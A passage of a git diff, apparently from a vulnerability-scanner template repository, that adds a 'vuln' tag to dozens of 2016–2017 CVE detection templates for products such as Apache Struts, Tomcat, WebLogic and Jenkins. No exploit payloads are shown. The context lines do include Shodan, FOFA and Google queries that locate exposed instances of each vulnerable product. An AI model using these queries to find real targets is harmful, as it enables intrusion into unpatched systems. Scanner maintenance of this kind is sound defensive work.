- tags: cve2016,cve,packetstorm,seclists,lfi,sap,edb,vkev + tags: cve2016,cve,packetstorm,seclists,lfi,sap,edb,vkev,vuln http: - method: GET diff --git a/http/cves/2016/CVE-2016-3081.yaml b/http/cves/2016/CVE-2016-3081.yaml index 7340ba0dce3..0ea2d53db17 100644 --- a/http/cves/2016/CVE-2016-3081.yaml +++ b/http/cves/2016/CVE-2016-3081.yaml @@ -37,7 +37,7 @@ info: - title="struts2 showcase" - body="apache struts" google-query: intitle:"struts2 showcase" - tags: cve2016,cve,struts,rce,apache + tags: cve2016,cve,struts,rce,apache,vuln http: - raw: diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml index c16e2f7c660..3583f517b22 100644 --- a/http/cves/2016/CVE-2016-3088.yaml +++ b/http/cves/2016/CVE-2016-3088.yaml @@ -30,7 +30,7 @@ info: shodan-query: - cpe:"cpe:2.3:a:apache:activemq" - product:"activemq openwire transport" - tags: cve2016,cve,fileupload,kev,edb,apache,activemq,intrusive,vkev + tags: cve2016,cve,fileupload,kev,edb,apache,activemq,intrusive,vkev,vuln variables: rand1: '{{rand_int(11111111, 99999999)}}' diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml index d704da2c77a..da668abc760 100644 --- a/http/cves/2016/CVE-2016-3978.yaml +++ b/http/cves/2016/CVE-2016-3978.yaml @@ -34,7 +34,7 @@ info: fofa-query: - body="/remote/login" "xxxxxxxx" - icon_hash=945408572 - tags: cve2016,cve,redirect,fortinet,fortios,seclists + tags: cve2016,cve,redirect,fortinet,fortios,seclists,vuln http: - method: GET diff --git a/http/cves/2016/CVE-2016-4437.yaml b/http/cves/2016/CVE-2016-4437.yaml index b61b23b442c..1373b4db454 100644 --- a/http/cves/2016/CVE-2016-4437.yaml +++ b/http/cves/2016/CVE-2016-4437.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: apache product: shiro - tags: cve2016,cve,apache,rce,kev,packetstorm,shiro,deserialization,oast,vkev + tags: cve2016,cve,apache,rce,kev,packetstorm,shiro,deserialization,oast,vkev,vuln http: - raw: diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml index 22d3778f4a4..17c37a8bc85 100644 --- a/http/cves/2016/CVE-2016-4975.yaml +++ b/http/cves/2016/CVE-2016-4975.yaml @@ -29,7 +29,7 @@ info: shodan-query: - cpe:"cpe:2.3:a:apache:http_server" - apache 2.4.49 - tags: cve2016,cve,crlf,apache,xss + tags: cve2016,cve,crlf,apache,xss,vuln http: - method: GET diff --git a/http/cves/2016/CVE-2016-4977.yaml b/http/cves/2016/CVE-2016-4977.yaml index 24ad7800f03..56e9ce85863 100644 --- a/http/cves/2016/CVE-2016-4977.yaml +++ b/http/cves/2016/CVE-2016-4977.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: pivotal product: spring_security_oauth - tags: cve2016,cve,oauth2,oauth,rce,ssti,vulhub,spring,pivotal,vkev + tags: cve2016,cve,oauth2,oauth,rce,ssti,vulhub,spring,pivotal,vkev,vuln http: - method: GET diff --git a/http/cves/2016/CVE-2016-5649.yaml b/http/cves/2016/CVE-2016-5649.yaml index e4004263a81..2989bd0757e 100644 --- a/http/cves/2016/CVE-2016-5649.yaml +++ b/http/cves/2016/CVE-2016-5649.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: netgear product: dgn2200_firmware - tags: cve2016,cve,iot,netgear,router,packetstorm + tags: cve2016,cve,iot,netgear,router,packetstorm,vuln http: - raw: diff --git a/http/cves/2016/CVE-2016-5674.yaml b/http/cves/2016/CVE-2016-5674.yaml index 241f12150d5..87e0b1055ad 100644 --- a/http/cves/2016/CVE-2016-5674.yaml +++ b/http/cves/2016/CVE-2016-5674.yaml @@ -25,7 +25,7 @@ info: fofa-query: - "app=\"NUUO-NVRmini\" || app=\"NUUO-NVR\" || title=\"Network Video Recorder Login\"" - app="nuuo-nvrmini" || app="nuuo-nvr" || title="network video recorder login" - tags: cve,cve2016,nuuo,rce,netgear,vkev + tags: cve,cve2016,nuuo,rce,netgear,vkev,vuln variables: rand: "{{to_lower(rand_text_alpha(32))}}" diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml index cd32a26c121..afbcf733f43 100644 --- a/http/cves/2016/CVE-2016-6195.yaml +++ b/http/cves/2016/CVE-2016-6195.yaml @@ -41,7 +41,7 @@ info: google-query: - intext:"powered by vbulletin" - intitle:"powered by vbulletin" - tags: cve2016,cve,vbulletin,sqli,forum,edb,vkev + tags: cve2016,cve,vbulletin,sqli,forum,edb,vkev,vuln http: - method: GET diff --git a/http/cves/2016/CVE-2016-6277.yaml b/http/cves/2016/CVE-2016-6277.yaml index 154e8477720..eac0711e254 100644 --- a/http/cves/2016/CVE-2016-6277.yaml +++ b/http/cves/2016/CVE-2016-6277.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: netgear product: d6220_firmware - tags: cve2016,cve,netgear,rce,iot,kev,vkev + tags: cve2016,cve,netgear,rce,iot,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2016/CVE-2016-6601.yaml b/http/cves/2016/CVE-2016-6601.yaml index f004fc7c1b7..e5e58d81a73 100644 --- a/http/cves/2016/CVE-2016-6601.yaml +++ b/http/cves/2016/CVE-2016-6601.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: zohocorp product: webnms_framework - tags: cve2016,cve,edb,zoho,lfi,webnms,zohocorp + tags: cve2016,cve,edb,zoho,lfi,webnms,zohocorp,vuln http: - method: GET diff --git a/http/cves/2016/CVE-2016-7552.yaml b/http/cves/2016/CVE-2016-7552.yaml index b240c8efb00..922c58da44c 100644 --- a/http/cves/2016/CVE-2016-7552.yaml +++ b/http/cves/2016/CVE-2016-7552.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: trendmicro product: threat_discovery_appliance - tags: cve2016,cve,msf,lfi,auth,bypass,trendmicro + tags: cve2016,cve,msf,lfi,auth,bypass,trendmicro,vuln http: - method: GET diff --git a/http/cves/2016/CVE-2016-7834.yaml b/http/cves/2016/CVE-2016-7834.yaml index 5d6fc34d0ee..60fa18a1a66 100644 --- a/http/cves/2016/CVE-2016-7834.yaml +++ b/http/cves/2016/CVE-2016-7834.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: sony product: snc_series_firmware - tags: cve2016,cve,sony,backdoor,unauth,telnet,iot,camera + tags: cve2016,cve,sony,backdoor,unauth,telnet,iot,camera,vuln http: - method: GET diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml index 7de91ffc84e..06a62b7de62 100644 --- a/http/cves/2016/CVE-2016-7981.yaml +++ b/http/cves/2016/CVE-2016-7981.yaml @@ -32,7 +32,7 @@ info: - http.html:"spip.php?page=backend" - cpe:"cpe:2.3:a:spip:spip" fofa-query: body="spip.php?page=backend" - tags: cve2016,cve,xss,spip + tags: cve2016,cve,xss,spip,vuln http: - method: GET diff --git a/http/cves/2016/CVE-2016-8527.yaml b/http/cves/2016/CVE-2016-8527.yaml index 5115b44cc75..6049d4e2cad 100644 --- a/http/cves/2016/CVE-2016-8527.yaml +++ b/http/cves/2016/CVE-2016-8527.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: hp product: airwave - tags: cve2016,cve,aruba,xss,edb,hp + tags: cve2016,cve,aruba,xss,edb,hp,vuln http: - method: GET diff --git a/http/cves/2016/CVE-2016-8735.yaml b/http/cves/2016/CVE-2016-8735.yaml index def978315cc..75f5e6db562 100644 --- a/http/cves/2016/CVE-2016-8735.yaml +++ b/http/cves/2016/CVE-2016-8735.yaml @@ -20,7 +20,7 @@ info: shodan-query: product:"tomcat" vendor: apache product: tomcat - tags: cve,cve2016,apache,tomcat,rce,kev,vkev + tags: cve,cve2016,apache,tomcat,rce,kev,vkev,vuln variables: OAST: "{{interactsh-url}}" diff --git a/http/cves/2016/CVE-2016-9299.yaml b/http/cves/2016/CVE-2016-9299.yaml index ab58d0a1fc8..dd84cabe731 100644 --- a/http/cves/2016/CVE-2016-9299.yaml +++ b/http/cves/2016/CVE-2016-9299.yaml @@ -24,7 +24,7 @@ info: product: jenkins shodan-query: product:"jenkins" fofa-query: icon_hash=81586312 - tags: cve,cve2016,rce,deserialization,vkev + tags: cve,cve2016,rce,deserialization,vkev,vuln variables: oast: "{{interactsh-url}}" diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml index 0d13372d707..29e608fb511 100644 --- a/http/cves/2017/CVE-2017-0929.yaml +++ b/http/cves/2017/CVE-2017-0929.yaml @@ -28,7 +28,7 @@ info: vendor: dnnsoftware product: dotnetnuke fofa-query: app="dotnetnuke" - tags: cve2017,cve,dnn,dotnetnuke,hackerone,oast,ssrf,dnnsoftware,vkev + tags: cve2017,cve,dnn,dotnetnuke,hackerone,oast,ssrf,dnnsoftware,vkev,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-1000028.yaml b/http/cves/2017/CVE-2017-1000028.yaml index 29703b59e62..059e4f3f47c 100644 --- a/http/cves/2017/CVE-2017-1000028.yaml +++ b/http/cves/2017/CVE-2017-1000028.yaml @@ -26,7 +26,7 @@ info: vendor: oracle product: glassfish_server shodan-query: cpe:"cpe:2.3:a:oracle:glassfish_server" - tags: cve,cve2017,oracle,glassfish,lfi,edb,vkev + tags: cve,cve2017,oracle,glassfish,lfi,edb,vkev,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-1000029.yaml b/http/cves/2017/CVE-2017-1000029.yaml index 11ed6b9abf7..126bce3d434 100644 --- a/http/cves/2017/CVE-2017-1000029.yaml +++ b/http/cves/2017/CVE-2017-1000029.yaml @@ -26,7 +26,7 @@ info: vendor: oracle product: glassfish_server shodan-query: cpe:"cpe:2.3:a:oracle:glassfish_server" - tags: cve,cve2017,glassfish,oracle,lfi + tags: cve,cve2017,glassfish,oracle,lfi,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-1000163.yaml b/http/cves/2017/CVE-2017-1000163.yaml index c7cd7014d72..d050a6ea7b6 100644 --- a/http/cves/2017/CVE-2017-1000163.yaml +++ b/http/cves/2017/CVE-2017-1000163.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: phoenixframework product: phoenix - tags: cve,cve2017,redirect,phoenix,phoenixframework + tags: cve,cve2017,redirect,phoenix,phoenixframework,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-1000170.yaml b/http/cves/2017/CVE-2017-1000170.yaml index 2ce54964106..e903921ba24 100644 --- a/http/cves/2017/CVE-2017-1000170.yaml +++ b/http/cves/2017/CVE-2017-1000170.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: jqueryfiletree_project product: jqueryfiletree - tags: cve2017,cve,wordpress,wp-plugin,lfi,jquery,edb,packetstorm,jqueryfiletree_project,vkev + tags: cve2017,cve,wordpress,wp-plugin,lfi,jquery,edb,packetstorm,jqueryfiletree_project,vkev,vuln http: - method: POST diff --git a/http/cves/2017/CVE-2017-1000486.yaml b/http/cves/2017/CVE-2017-1000486.yaml index f8310758167..bb0c51fc666 100644 --- a/http/cves/2017/CVE-2017-1000486.yaml +++ b/http/cves/2017/CVE-2017-1000486.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: primetek product: primefaces - tags: cve2017,cve,primetek,rce,injection,kev,vkev + tags: cve2017,cve,primetek,rce,injection,kev,vkev,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-10075.yaml b/http/cves/2017/CVE-2017-10075.yaml index d96f1f03acd..41b7638b7df 100644 --- a/http/cves/2017/CVE-2017-10075.yaml +++ b/http/cves/2017/CVE-2017-10075.yaml @@ -29,7 +29,7 @@ info: vendor: oracle product: webcenter_content google-query: inurl:"/cs/idcplg" - tags: cve,cve2017,xss,oracle + tags: cve,cve2017,xss,oracle,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-10271.yaml b/http/cves/2017/CVE-2017-10271.yaml index b84d0f09972..ee0b0ce41ed 100644 --- a/http/cves/2017/CVE-2017-10271.yaml +++ b/http/cves/2017/CVE-2017-10271.yaml @@ -32,7 +32,7 @@ info: - product:"oracle weblogic" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" - tags: cve,cve2017,weblogic,oast,kev,vulhub,rce,oracle,vkev + tags: cve,cve2017,weblogic,oast,kev,vulhub,rce,oracle,vkev,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-10974.yaml b/http/cves/2017/CVE-2017-10974.yaml index 861444f59d3..7010ae50455 100644 --- a/http/cves/2017/CVE-2017-10974.yaml +++ b/http/cves/2017/CVE-2017-10974.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: yaws product: yaws - tags: cve,cve2017,edb,yaws,lfi,vkev + tags: cve,cve2017,edb,yaws,lfi,vkev,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-11165.yaml b/http/cves/2017/CVE-2017-11165.yaml index 15bce21328d..d10a8096fdd 100644 --- a/http/cves/2017/CVE-2017-11165.yaml +++ b/http/cves/2017/CVE-2017-11165.yaml @@ -32,7 +32,7 @@ info: shodan-query: http.title:"datataker" fofa-query: title="datataker" google-query: intitle:"datataker" - tags: cve2017,cve,lfr,edb,datataker,config,packetstorm,exposure + tags: cve2017,cve,lfr,edb,datataker,config,packetstorm,exposure,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-11444.yaml b/http/cves/2017/CVE-2017-11444.yaml index 8a9d4fcb465..0228c6d2dd8 100644 --- a/http/cves/2017/CVE-2017-11444.yaml +++ b/http/cves/2017/CVE-2017-11444.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: intelliants product: subrion_cms - tags: cve2017,cve,sqli,subrion,intelliants + tags: cve2017,cve,sqli,subrion,intelliants,vuln variables: string: "{{to_lower(rand_base(5))}}" hex_string: "{{hex_encode(string)}}" diff --git a/http/cves/2017/CVE-2017-11512.yaml b/http/cves/2017/CVE-2017-11512.yaml index 3599a0dfdcf..655aa000b26 100644 --- a/http/cves/2017/CVE-2017-11512.yaml +++ b/http/cves/2017/CVE-2017-11512.yaml @@ -34,7 +34,7 @@ info: - http.title:"manageengine" fofa-query: title="manageengine" google-query: intitle:"manageengine" - tags: cve,cve2017,manageengine,lfr,unauth,tenable,vkev + tags: cve,cve2017,manageengine,lfr,unauth,tenable,vkev,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-11586.yaml b/http/cves/2017/CVE-2017-11586.yaml index 640b380a762..a6e44843b2c 100644 --- a/http/cves/2017/CVE-2017-11586.yaml +++ b/http/cves/2017/CVE-2017-11586.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: finecms product: finecms - tags: cve,cve2017,redirect,finecms + tags: cve,cve2017,redirect,finecms,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-11610.yaml b/http/cves/2017/CVE-2017-11610.yaml index bdd995be12b..7a40ed9cadc 100644 --- a/http/cves/2017/CVE-2017-11610.yaml +++ b/http/cves/2017/CVE-2017-11610.yaml @@ -32,7 +32,7 @@ info: - http.title:"supervisor status" fofa-query: title="supervisor status" google-query: intitle:"supervisor status" - tags: cve2017,cve,oast,xmlrpc,msf,rce,supervisor,supervisord,vkev + tags: cve2017,cve,oast,xmlrpc,msf,rce,supervisor,supervisord,vkev,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-11629.yaml b/http/cves/2017/CVE-2017-11629.yaml index 851bb36f55a..9a453a966bd 100644 --- a/http/cves/2017/CVE-2017-11629.yaml +++ b/http/cves/2017/CVE-2017-11629.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: finecms product: finecms - tags: cve,cve2017,xss,finecms + tags: cve,cve2017,xss,finecms,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-12138.yaml b/http/cves/2017/CVE-2017-12138.yaml index 8618a18f24b..d4fd86b2429 100644 --- a/http/cves/2017/CVE-2017-12138.yaml +++ b/http/cves/2017/CVE-2017-12138.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: xoops product: xoops - tags: cve,cve2017,redirect,xoops,authenticated + tags: cve,cve2017,redirect,xoops,authenticated,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-12149.yaml b/http/cves/2017/CVE-2017-12149.yaml index 370bf7348ac..e3a02ad166d 100644 --- a/http/cves/2017/CVE-2017-12149.yaml +++ b/http/cves/2017/CVE-2017-12149.yaml @@ -32,7 +32,7 @@ info: - cpe:"cpe:2.3:a:redhat:jboss_enterprise_application_platform" fofa-query: title="jboss" google-query: intitle:"jboss" - tags: cve2017,cve,java,rce,deserialization,kev,vulhub,jboss,intrusive,redhat,vkev + tags: cve2017,cve,java,rce,deserialization,kev,vulhub,jboss,intrusive,redhat,vkev,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-12542.yaml b/http/cves/2017/CVE-2017-12542.yaml index 287fa03128f..ba6dc40d011 100644 --- a/http/cves/2017/CVE-2017-12542.yaml +++ b/http/cves/2017/CVE-2017-12542.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: hp product: integrated_lights-out_4_firmware - tags: cve,cve2017,ilo4,hpe,auth-bypass,edb,hp,vkev + tags: cve,cve2017,ilo4,hpe,auth-bypass,edb,hp,vkev,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-12544.yaml b/http/cves/2017/CVE-2017-12544.yaml index da91fed997c..71f443840a7 100644 --- a/http/cves/2017/CVE-2017-12544.yaml +++ b/http/cves/2017/CVE-2017-12544.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: hp product: system_management_homepage - tags: cve,cve2017,xss,hp + tags: cve,cve2017,xss,hp,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-12583.yaml b/http/cves/2017/CVE-2017-12583.yaml index 37fadc17075..738641ae262 100644 --- a/http/cves/2017/CVE-2017-12583.yaml +++ b/http/cves/2017/CVE-2017-12583.yaml @@ -31,7 +31,7 @@ info: - cpe:"cpe:2.3:a:dokuwiki:dokuwiki" fofa-query: title="dokuwiki" google-query: intitle:"dokuwiki" - tags: cve,cve2017,xss,dokuwiki + tags: cve,cve2017,xss,dokuwiki,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-12611.yaml b/http/cves/2017/CVE-2017-12611.yaml index b6b44d9ddb1..daff50adcee 100644 --- a/http/cves/2017/CVE-2017-12611.yaml +++ b/http/cves/2017/CVE-2017-12611.yaml @@ -36,7 +36,7 @@ info: - title="struts2 showcase" - body="apache struts" google-query: intitle:"struts2 showcase" - tags: cve,cve2017,apache,rce,struts,vkev + tags: cve,cve2017,apache,rce,struts,vkev,vuln http: - method: POST diff --git a/http/cves/2017/CVE-2017-12615.yaml b/http/cves/2017/CVE-2017-12615.yaml index f72fff3daa7..89f3367b69b 100644 --- a/http/cves/2017/CVE-2017-12615.yaml +++ b/http/cves/2017/CVE-2017-12615.yaml @@ -37,7 +37,7 @@ info: - body="apache tomcat" - title="apache tomcat" google-query: intitle:"apache tomcat" - tags: cve2017,cve,rce,tomcat,kev,vulhub,apache,fileupload,intrusive,vkev + tags: cve2017,cve,rce,tomcat,kev,vulhub,apache,fileupload,intrusive,vkev,vuln http: - method: PUT diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml index 34b350dc569..8be11387ada 100644 --- a/http/cves/2017/CVE-2017-12617.yaml +++ b/http/cves/2017/CVE-2017-12617.yaml @@ -38,7 +38,7 @@ info: - body="apache tomcat" - title="apache tomcat" google-query: intitle:"apache tomcat" - tags: cve2017,cve,tomcat,apache,rce,kev,intrusive,vkev + tags: cve2017,cve,tomcat,apache,rce,kev,intrusive,vkev,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-12629.yaml b/http/cves/2017/CVE-2017-12629.yaml index 41ec4ad1ae6..0cbf2c90ec2 100644 --- a/http/cves/2017/CVE-2017-12629.yaml +++ b/http/cves/2017/CVE-2017-12629.yaml @@ -37,7 +37,7 @@ info: google-query: - intitle:"apache solr" - intitle:"solr admin" - tags: cve2017,cve,oast,xxe,vulhub,solr,apache + tags: cve2017,cve,oast,xxe,vulhub,solr,apache,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-12635.yaml b/http/cves/2017/CVE-2017-12635.yaml index 1ffb6df0155..5a264434094 100644 --- a/http/cves/2017/CVE-2017-12635.yaml +++ b/http/cves/2017/CVE-2017-12635.yaml @@ -30,7 +30,7 @@ info: shodan-query: - product:"couchdb" - cpe:"cpe:2.3:a:apache:couchdb" - tags: cve2017,cve,couchdb,apache,intrusive,vkev + tags: cve2017,cve,couchdb,apache,intrusive,vkev,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index 6f8d621185c..aeacfa1e518 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml @@ -29,7 +29,7 @@ info: product: netweaver_application_server_java shodan-query: http.favicon.hash:-266008933 fofa-query: icon_hash=-266008933 - tags: cve2017,cve,sap,lfi,java,traversal,kev,vkev + tags: cve2017,cve,sap,lfi,java,traversal,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml index 93529794fe2..4d6b4a6ad3f 100644 --- a/http/cves/2017/CVE-2017-12794.yaml +++ b/http/cves/2017/CVE-2017-12794.yaml @@ -29,7 +29,7 @@ info: vendor: djangoproject product: django shodan-query: cpe:"cpe:2.3:a:djangoproject:django" - tags: cve2017,cve,xss,django,djangoproject + tags: cve2017,cve,xss,django,djangoproject,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml index 7f2602c7a1b..a14bcfcf421 100644 --- a/http/cves/2017/CVE-2017-14135.yaml +++ b/http/cves/2017/CVE-2017-14135.yaml @@ -32,7 +32,7 @@ info: - http.title:"dreambox webcontrol" fofa-query: title="dreambox webcontrol" google-query: intitle:"dreambox webcontrol" - tags: cve,cve2017,dreambox,rce,oast,edb,vkev + tags: cve,cve2017,dreambox,rce,oast,edb,vkev,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-14186.yaml b/http/cves/2017/CVE-2017-14186.yaml index ba690cf3892..c2b5a59356e 100644 --- a/http/cves/2017/CVE-2017-14186.yaml +++ b/http/cves/2017/CVE-2017-14186.yaml @@ -37,7 +37,7 @@ info: fofa-query: - body="/remote/login" "xxxxxxxx" - icon_hash=945408572 - tags: cve2017,cve,fortigate,xss,fortinet + tags: cve2017,cve,fortigate,xss,fortinet,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-14524.yaml b/http/cves/2017/CVE-2017-14524.yaml index 5d32b082d1e..94d3d3b4f60 100644 --- a/http/cves/2017/CVE-2017-14524.yaml +++ b/http/cves/2017/CVE-2017-14524.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: opentext product: documentum_administrator - tags: cve2017,cve,redirect,opentext,seclists + tags: cve2017,cve,redirect,opentext,seclists,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-14535.yaml b/http/cves/2017/CVE-2017-14535.yaml index f6c497f31cb..1de9f4a73a3 100644 --- a/http/cves/2017/CVE-2017-14535.yaml +++ b/http/cves/2017/CVE-2017-14535.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: netfortris product: trixbox - tags: cve,cve2017,trixbox,rce,injection,edb,netfortris + tags: cve,cve2017,trixbox,rce,injection,edb,netfortris,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-14537.yaml b/http/cves/2017/CVE-2017-14537.yaml index 62b36f6a6da..833905ec4c7 100644 --- a/http/cves/2017/CVE-2017-14537.yaml +++ b/http/cves/2017/CVE-2017-14537.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: netfortris product: trixbox - tags: cve,cve2017,trixbox,lfi,packetstorm,netfortris + tags: cve,cve2017,trixbox,lfi,packetstorm,netfortris,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml index 27f8a5d7c84..3983f5f7551 100644 --- a/http/cves/2017/CVE-2017-14622.yaml +++ b/http/cves/2017/CVE-2017-14622.yaml @@ -30,7 +30,7 @@ info: vendor: 2kblater product: 2kb_amazon_affiliates_store framework: wordpress - tags: cve2017,cve,xss,wordpress,wp-plugin,wp,2kb-amazon-affiliates-store,authenticated,packetstorm,2kblater + tags: cve2017,cve,xss,wordpress,wp-plugin,wp,2kb-amazon-affiliates-store,authenticated,packetstorm,2kblater,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-14651.yaml b/http/cves/2017/CVE-2017-14651.yaml index c5eaa9d8441..ba5b79dc87e 100644 --- a/http/cves/2017/CVE-2017-14651.yaml +++ b/http/cves/2017/CVE-2017-14651.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.favicon.hash:1398055326 fofa-query: icon_hash=1398055326 google-query: inurl:"carbon/admin/login" - tags: cve,cve2017,wso2,xss + tags: cve,cve2017,wso2,xss,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-14849.yaml b/http/cves/2017/CVE-2017-14849.yaml index c89dfb98114..d57d59e20cc 100644 --- a/http/cves/2017/CVE-2017-14849.yaml +++ b/http/cves/2017/CVE-2017-14849.yaml @@ -28,7 +28,7 @@ info: vendor: nodejs product: node.js shodan-query: cpe:"cpe:2.3:a:nodejs:node.js" - tags: cve2017,cve,nodejs,lfi + tags: cve2017,cve,nodejs,lfi,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-14942.yaml b/http/cves/2017/CVE-2017-14942.yaml index 489bcd51410..4be6822745e 100644 --- a/http/cves/2017/CVE-2017-14942.yaml +++ b/http/cves/2017/CVE-2017-14942.yaml @@ -26,7 +26,7 @@ info: product: wrn150 shodan-query: html:"WRN150" fofa-query: title="WRN150" - tags: cve,cve2017,intelbras,auth-bypass,router + tags: cve,cve2017,intelbras,auth-bypass,router,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-15287.yaml b/http/cves/2017/CVE-2017-15287.yaml index 538c91a0dfb..16e08bb41e6 100644 --- a/http/cves/2017/CVE-2017-15287.yaml +++ b/http/cves/2017/CVE-2017-15287.yaml @@ -28,7 +28,7 @@ info: vendor: bouqueteditor_project product: bouqueteditor framework: dreambox - tags: cve,cve2017,dreambox,edb,xss,bouqueteditor_project + tags: cve,cve2017,dreambox,edb,xss,bouqueteditor_project,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-15363.yaml b/http/cves/2017/CVE-2017-15363.yaml index 5c324c5d211..02b5026ff52 100644 --- a/http/cves/2017/CVE-2017-15363.yaml +++ b/http/cves/2017/CVE-2017-15363.yaml @@ -28,7 +28,7 @@ info: vendor: luracast product: restler framework: typo3 - tags: cve,cve2017,restler,lfi,edb,luracast,typo3,vkev + tags: cve,cve2017,restler,lfi,edb,luracast,typo3,vkev,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-15647.yaml b/http/cves/2017/CVE-2017-15647.yaml index 9c4cfcb6b4e..8cdd9843f5b 100644 --- a/http/cves/2017/CVE-2017-15647.yaml +++ b/http/cves/2017/CVE-2017-15647.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: fiberhome product: routerfiberhome_firmware - tags: cve,cve2017,lfi,router,edb,fiberhome + tags: cve,cve2017,lfi,router,edb,fiberhome,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml index a235ca2e6f5..8e62a97e010 100644 --- a/http/cves/2017/CVE-2017-15715.yaml +++ b/http/cves/2017/CVE-2017-15715.yaml @@ -30,7 +30,7 @@ info: shodan-query: - cpe:"cpe:2.3:a:apache:http_server" - apache 2.4.49 - tags: cve,cve2017,apache,httpd,fileupload,vulhub,intrusive,vkev + tags: cve,cve2017,apache,httpd,fileupload,vulhub,intrusive,vkev,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-15944.yaml b/http/cves/2017/CVE-2017-15944.yaml index 83b366483e9..d405b6d26ab 100644 --- a/http/cves/2017/CVE-2017-15944.yaml +++ b/http/cves/2017/CVE-2017-15944.yaml @@ -30,7 +30,7 @@ info: - http.favicon.hash:"-631559155" - cpe:"cpe:2.3:o:paloaltonetworks:pan-os" fofa-query: icon_hash="-631559155" - tags: cve2017,cve,kev,edb,rce,vpn,panos,globalprotect,paloaltonetworks,vkev + tags: cve2017,cve,kev,edb,rce,vpn,panos,globalprotect,paloaltonetworks,vkev,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-16806.yaml b/http/cves/2017/CVE-2017-16806.yaml index 966882be0d7..c4e3824cb31 100644 --- a/http/cves/2017/CVE-2017-16806.yaml +++ b/http/cves/2017/CVE-2017-16806.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: ulterius product: ulterius_server - tags: cve2017,cve,ulterius,traversal,edb + tags: cve2017,cve,ulterius,traversal,edb,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-16877.yaml b/http/cves/2017/CVE-2017-16877.yaml index 150de8663da..fa5b870dd6f 100644 --- a/http/cves/2017/CVE-2017-16877.yaml +++ b/http/cves/2017/CVE-2017-16877.yaml @@ -31,7 +31,7 @@ info: - http.html:"/_next/static" - cpe:"cpe:2.3:a:zeit:next.js" fofa-query: body="/_next/static" - tags: cve,cve2017,nextjs,lfi,traversal,zeit + tags: cve,cve2017,nextjs,lfi,traversal,zeit,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-16894.yaml 